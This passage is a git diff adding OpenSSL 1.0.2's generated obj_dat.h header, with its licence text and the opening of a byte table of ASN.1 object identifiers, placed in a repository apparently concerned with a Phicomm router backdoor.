diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.h
new file mode 100644
index 0000000..b7e3cf2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_dat.h
@@ -0,0 +1,5319 @@
+/* crypto/objects/obj_dat.h */
+
+/* THIS FILE IS GENERATED FROM objects.h by obj_dat.pl via the
+ * following command:
+ * perl obj_dat.pl obj_mac.h obj_dat.h
+ */
+
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#define NUM_NID 958
+#define NUM_SN 951
+#define NUM_LN 951
+#define NUM_OBJ 890
+
+static const unsigned char lvalues[6255]={
+0x2A,0x86,0x48,0x86,0xF7,0x0D,               /* [  0] OBJ_rsadsi */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,          /* [  6] OBJ_pkcs */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x02,     /* [ 13] OBJ_md2 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x05,     /* [ 21] OBJ_md5 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x03,0x04,     /* [ 29] OBJ_rc4 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x01,/* [ 37] OBJ_rsaEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x02,/* [ 46] OBJ_md2WithRSAEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x04,/* [ 55] OBJ_md5WithRSAEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x01,/* [ 64] OBJ_pbeWithMD2AndDES_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x03,/* [ 73] OBJ_pbeWithMD5AndDES_CBC */
+0x55,                                        /* [ 82] OBJ_X500 */
+0x55,0x04,                                   /* [ 83] OBJ_X509 */
+0x55,0x04,0x03,                              /* [ 85] OBJ_commonName */
+0x55,0x04,0x06,                              /* [ 88] OBJ_countryName */
+0x55,0x04,0x07,                              /* [ 91] OBJ_localityName */
+0x55,0x04,0x08,                              /* [ 94] OBJ_stateOrProvinceName */
+0x55,0x04,0x0A,                              /* [ 97] OBJ_organizationName */
+0x55,0x04,0x0B,                              /* [100] OBJ_organizationalUnitName */
+0x55,0x08,0x01,0x01,                         /* [103] OBJ_rsa */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,     /* [107] OBJ_pkcs7 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,0x01,/* [115] OBJ_pkcs7_data */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,0x02,/* [124] OBJ_pkcs7_signed */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,0x03,/* [133] OBJ_pkcs7_enveloped */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,0x04,/* [142] OBJ_pkcs7_signedAndEnveloped */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,0x05,/* [151] OBJ_pkcs7_digest */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x07,0x06,/* [160] OBJ_pkcs7_encrypted */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x03,     /* [169] OBJ_pkcs3 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x03,0x01,/* [177] OBJ_dhKeyAgreement */
+0x2B,0x0E,0x03,0x02,0x06,                    /* [186] OBJ_des_ecb */
+0x2B,0x0E,0x03,0x02,0x09,                    /* [191] OBJ_des_cfb64 */
+0x2B,0x0E,0x03,0x02,0x07,                    /* [196] OBJ_des_cbc */
+0x2B,0x0E,0x03,0x02,0x11,                    /* [201] OBJ_des_ede_ecb */
+0x2B,0x06,0x01,0x04,0x01,0x81,0x3C,0x07,0x01,0x01,0x02,/* [206] OBJ_idea_cbc */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x03,0x02,     /* [217] OBJ_rc2_cbc */
+0x2B,0x0E,0x03,0x02,0x12,                    /* [225] OBJ_sha */
+0x2B,0x0E,0x03,0x02,0x0F,                    /* [230] OBJ_shaWithRSAEncryption */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x03,0x07,     /* [235] OBJ_des_ede3_cbc */
+0x2B,0x0E,0x03,0x02,0x08,                    /* [243] OBJ_des_ofb64 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,     /* [248] OBJ_pkcs9 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x01,/* [256] OBJ_pkcs9_emailAddress */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x02,/* [265] OBJ_pkcs9_unstructuredName */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x03,/* [274] OBJ_pkcs9_contentType */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x04,/* [283] OBJ_pkcs9_messageDigest */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x05,/* [292] OBJ_pkcs9_signingTime */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x06,/* [301] OBJ_pkcs9_countersignature */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x07,/* [310] OBJ_pkcs9_challengePassword */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x08,/* [319] OBJ_pkcs9_unstructuredAddress */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x09,/* [328] OBJ_pkcs9_extCertAttributes */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,          /* [337] OBJ_netscape */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,     /* [344] OBJ_netscape_cert_extension */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x02,     /* [352] OBJ_netscape_data_type */
+0x2B,0x0E,0x03,0x02,0x1A,                    /* [360] OBJ_sha1 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x05,/* [365] OBJ_sha1WithRSAEncryption */
+0x2B,0x0E,0x03,0x02,0x0D,                    /* [374] OBJ_dsaWithSHA */
+0x2B,0x0E,0x03,0x02,0x0C,                    /* [379] OBJ_dsa_2 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x0B,/* [384] OBJ_pbeWithSHA1AndRC2_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x0C,/* [393] OBJ_id_pbkdf2 */
+0x2B,0x0E,0x03,0x02,0x1B,                    /* [402] OBJ_dsaWithSHA1_2 */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x01,/* [407] OBJ_netscape_cert_type */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x02,/* [416] OBJ_netscape_base_url */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x03,/* [425] OBJ_netscape_revocation_url */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x04,/* [434] OBJ_netscape_ca_revocation_url */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x07,/* [443] OBJ_netscape_renewal_url */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x08,/* [452] OBJ_netscape_ca_policy_url */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x0C,/* [461] OBJ_netscape_ssl_server_name */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x01,0x0D,/* [470] OBJ_netscape_comment */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x02,0x05,/* [479] OBJ_netscape_cert_sequence */
+0x55,0x1D,                                   /* [488] OBJ_id_ce */
+0x55,0x1D,0x0E,                              /* [490] OBJ_subject_key_identifier */
+0x55,0x1D,0x0F,                              /* [493] OBJ_key_usage */
+0x55,0x1D,0x10,                              /* [496] OBJ_private_key_usage_period */
+0x55,0x1D,0x11,                              /* [499] OBJ_subject_alt_name */
+0x55,0x1D,0x12,                              /* [502] OBJ_issuer_alt_name */
+0x55,0x1D,0x13,                              /* [505] OBJ_basic_constraints */
+0x55,0x1D,0x14,                              /* [508] OBJ_crl_number */
+0x55,0x1D,0x20,                              /* [511] OBJ_certificate_policies */
+0x55,0x1D,0x23,                              /* [514] OBJ_authority_key_identifier */
+0x2B,0x06,0x01,0x04,0x01,0x97,0x55,0x01,0x02,/* [517] OBJ_bf_cbc */
+0x55,0x08,0x03,0x65,                         /* [526] OBJ_mdc2 */
+0x55,0x08,0x03,0x64,                         /* [530] OBJ_mdc2WithRSA */
+0x55,0x04,0x2A,                              /* [534] OBJ_givenName */
+0x55,0x04,0x04,                              /* [537] OBJ_surname */
+0x55,0x04,0x2B,                              /* [540] OBJ_initials */
+0x55,0x1D,0x1F,                              /* [543] OBJ_crl_distribution_points */
+0x2B,0x0E,0x03,0x02,0x03,                    /* [546] OBJ_md5WithRSA */
+0x55,0x04,0x05,                              /* [551] OBJ_serialNumber */
+0x55,0x04,0x0C,                              /* [554] OBJ_title */
+0x55,0x04,0x0D,                              /* [557] OBJ_description */
+0x2A,0x86,0x48,0x86,0xF6,0x7D,0x07,0x42,0x0A,/* [560] OBJ_cast5_cbc */
+0x2A,0x86,0x48,0x86,0xF6,0x7D,0x07,0x42,0x0C,/* [569] OBJ_pbeWithMD5AndCast5_CBC */
+0x2A,0x86,0x48,0xCE,0x38,0x04,0x03,          /* [578] OBJ_dsaWithSHA1 */
+0x2B,0x0E,0x03,0x02,0x1D,                    /* [585] OBJ_sha1WithRSA */
+0x2A,0x86,0x48,0xCE,0x38,0x04,0x01,          /* [590] OBJ_dsa */
+0x2B,0x24,0x03,0x02,0x01,                    /* [597] OBJ_ripemd160 */
+0x2B,0x24,0x03,0x03,0x01,0x02,               /* [602] OBJ_ripemd160WithRSA */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x03,0x08,     /* [608] OBJ_rc5_cbc */
+0x29,0x01,0x01,0x85,0x1A,0x01,               /* [616] OBJ_rle_compression */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x08,/* [622] OBJ_zlib_compression */
+0x55,0x1D,0x25,                              /* [633] OBJ_ext_key_usage */
+0x2B,0x06,0x01,0x05,0x05,0x07,               /* [636] OBJ_id_pkix */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,          /* [642] OBJ_id_kp */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x01,     /* [649] OBJ_server_auth */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x02,     /* [657] OBJ_client_auth */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x03,     /* [665] OBJ_code_sign */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x04,     /* [673] OBJ_email_protect */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x08,     /* [681] OBJ_time_stamp */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x01,0x15,/* [689] OBJ_ms_code_ind */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x01,0x16,/* [699] OBJ_ms_code_com */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x0A,0x03,0x01,/* [709] OBJ_ms_ctl_sign */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x0A,0x03,0x03,/* [719] OBJ_ms_sgc */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x0A,0x03,0x04,/* [729] OBJ_ms_efs */
+0x60,0x86,0x48,0x01,0x86,0xF8,0x42,0x04,0x01,/* [739] OBJ_ns_sgc */
+0x55,0x1D,0x1B,                              /* [748] OBJ_delta_crl */
+0x55,0x1D,0x15,                              /* [751] OBJ_crl_reason */
+0x55,0x1D,0x18,                              /* [754] OBJ_invalidity_date */
+0x2B,0x65,0x01,0x04,0x01,                    /* [757] OBJ_sxnet */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x01,0x01,/* [762] OBJ_pbe_WithSHA1And128BitRC4 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x01,0x02,/* [772] OBJ_pbe_WithSHA1And40BitRC4 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x01,0x03,/* [782] OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x01,0x04,/* [792] OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x01,0x05,/* [802] OBJ_pbe_WithSHA1And128BitRC2_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x01,0x06,/* [812] OBJ_pbe_WithSHA1And40BitRC2_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x0A,0x01,0x01,/* [822] OBJ_keyBag */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x0A,0x01,0x02,/* [833] OBJ_pkcs8ShroudedKeyBag */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x0A,0x01,0x03,/* [844] OBJ_certBag */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x0A,0x01,0x04,/* [855] OBJ_crlBag */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x0A,0x01,0x05,/* [866] OBJ_secretBag */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x0C,0x0A,0x01,0x06,/* [877] OBJ_safeContentsBag */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x14,/* [888] OBJ_friendlyName */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x15,/* [897] OBJ_localKeyID */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x16,0x01,/* [906] OBJ_x509Certificate */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x16,0x02,/* [916] OBJ_sdsiCertificate */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x17,0x01,/* [926] OBJ_x509Crl */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x0D,/* [936] OBJ_pbes2 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x0E,/* [945] OBJ_pbmac1 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x07,     /* [954] OBJ_hmacWithSHA1 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x02,0x01,     /* [962] OBJ_id_qt_cps */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x02,0x02,     /* [970] OBJ_id_qt_unotice */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x0F,/* [978] OBJ_SMIMECapabilities */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x04,/* [987] OBJ_pbeWithMD2AndRC2_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x06,/* [996] OBJ_pbeWithMD5AndRC2_CBC */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,0x0A,/* [1005] OBJ_pbeWithSHA1AndDES_CBC */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x01,0x0E,/* [1014] OBJ_ms_ext_req */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x0E,/* [1024] OBJ_ext_req */
+0x55,0x04,0x29,                              /* [1033] OBJ_name */
+0x55,0x04,0x2E,                              /* [1036] OBJ_dnQualifier */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,          /* [1039] OBJ_id_pe */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,          /* [1046] OBJ_id_ad */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x01,     /* [1053] OBJ_info_access */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,     /* [1061] OBJ_ad_OCSP */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x02,     /* [1069] OBJ_ad_ca_issuers */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x09,     /* [1077] OBJ_OCSP_sign */
+0x2A,                                        /* [1085] OBJ_member_body */
+0x2A,0x86,0x48,                              /* [1086] OBJ_ISO_US */
+0x2A,0x86,0x48,0xCE,0x38,                    /* [1089] OBJ_X9_57 */
+0x2A,0x86,0x48,0xCE,0x38,0x04,               /* [1094] OBJ_X9cm */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,     /* [1100] OBJ_pkcs1 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x05,     /* [1108] OBJ_pkcs5 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,/* [1116] OBJ_SMIME */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,/* [1125] OBJ_id_smime_mod */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,/* [1135] OBJ_id_smime_ct */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,/* [1145] OBJ_id_smime_aa */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,/* [1155] OBJ_id_smime_alg */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x04,/* [1165] OBJ_id_smime_cd */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x05,/* [1175] OBJ_id_smime_spq */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,/* [1185] OBJ_id_smime_cti */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x01,/* [1195] OBJ_id_smime_mod_cms */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x02,/* [1206] OBJ_id_smime_mod_ess */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x03,/* [1217] OBJ_id_smime_mod_oid */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x04,/* [1228] OBJ_id_smime_mod_msg_v3 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x05,/* [1239] OBJ_id_smime_mod_ets_eSignature_88 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x06,/* [1250] OBJ_id_smime_mod_ets_eSignature_97 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x07,/* [1261] OBJ_id_smime_mod_ets_eSigPolicy_88 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x00,0x08,/* [1272] OBJ_id_smime_mod_ets_eSigPolicy_97 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x01,/* [1283] OBJ_id_smime_ct_receipt */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x02,/* [1294] OBJ_id_smime_ct_authData */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x03,/* [1305] OBJ_id_smime_ct_publishCert */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x04,/* [1316] OBJ_id_smime_ct_TSTInfo */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x05,/* [1327] OBJ_id_smime_ct_TDTInfo */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x06,/* [1338] OBJ_id_smime_ct_contentInfo */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x07,/* [1349] OBJ_id_smime_ct_DVCSRequestData */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x01,0x08,/* [1360] OBJ_id_smime_ct_DVCSResponseData */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x01,/* [1371] OBJ_id_smime_aa_receiptRequest */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x02,/* [1382] OBJ_id_smime_aa_securityLabel */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x03,/* [1393] OBJ_id_smime_aa_mlExpandHistory */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x04,/* [1404] OBJ_id_smime_aa_contentHint */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x05,/* [1415] OBJ_id_smime_aa_msgSigDigest */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x06,/* [1426] OBJ_id_smime_aa_encapContentType */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x07,/* [1437] OBJ_id_smime_aa_contentIdentifier */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x08,/* [1448] OBJ_id_smime_aa_macValue */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x09,/* [1459] OBJ_id_smime_aa_equivalentLabels */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x0A,/* [1470] OBJ_id_smime_aa_contentReference */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x0B,/* [1481] OBJ_id_smime_aa_encrypKeyPref */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x0C,/* [1492] OBJ_id_smime_aa_signingCertificate */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x0D,/* [1503] OBJ_id_smime_aa_smimeEncryptCerts */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x0E,/* [1514] OBJ_id_smime_aa_timeStampToken */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x0F,/* [1525] OBJ_id_smime_aa_ets_sigPolicyId */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x10,/* [1536] OBJ_id_smime_aa_ets_commitmentType */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x11,/* [1547] OBJ_id_smime_aa_ets_signerLocation */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x12,/* [1558] OBJ_id_smime_aa_ets_signerAttr */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x13,/* [1569] OBJ_id_smime_aa_ets_otherSigCert */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x14,/* [1580] OBJ_id_smime_aa_ets_contentTimestamp */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x15,/* [1591] OBJ_id_smime_aa_ets_CertificateRefs */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x16,/* [1602] OBJ_id_smime_aa_ets_RevocationRefs */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x17,/* [1613] OBJ_id_smime_aa_ets_certValues */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x18,/* [1624] OBJ_id_smime_aa_ets_revocationValues */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x19,/* [1635] OBJ_id_smime_aa_ets_escTimeStamp */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x1A,/* [1646] OBJ_id_smime_aa_ets_certCRLTimestamp */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x1B,/* [1657] OBJ_id_smime_aa_ets_archiveTimeStamp */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x1C,/* [1668] OBJ_id_smime_aa_signatureType */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x02,0x1D,/* [1679] OBJ_id_smime_aa_dvcs_dvc */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x01,/* [1690] OBJ_id_smime_alg_ESDHwith3DES */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x02,/* [1701] OBJ_id_smime_alg_ESDHwithRC2 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x03,/* [1712] OBJ_id_smime_alg_3DESwrap */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x04,/* [1723] OBJ_id_smime_alg_RC2wrap */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x05,/* [1734] OBJ_id_smime_alg_ESDH */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x06,/* [1745] OBJ_id_smime_alg_CMS3DESwrap */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x07,/* [1756] OBJ_id_smime_alg_CMSRC2wrap */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x04,0x01,/* [1767] OBJ_id_smime_cd_ldap */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x05,0x01,/* [1778] OBJ_id_smime_spq_ets_sqt_uri */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x05,0x02,/* [1789] OBJ_id_smime_spq_ets_sqt_unotice */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,0x01,/* [1800] OBJ_id_smime_cti_ets_proofOfOrigin */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,0x02,/* [1811] OBJ_id_smime_cti_ets_proofOfReceipt */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,0x03,/* [1822] OBJ_id_smime_cti_ets_proofOfDelivery */
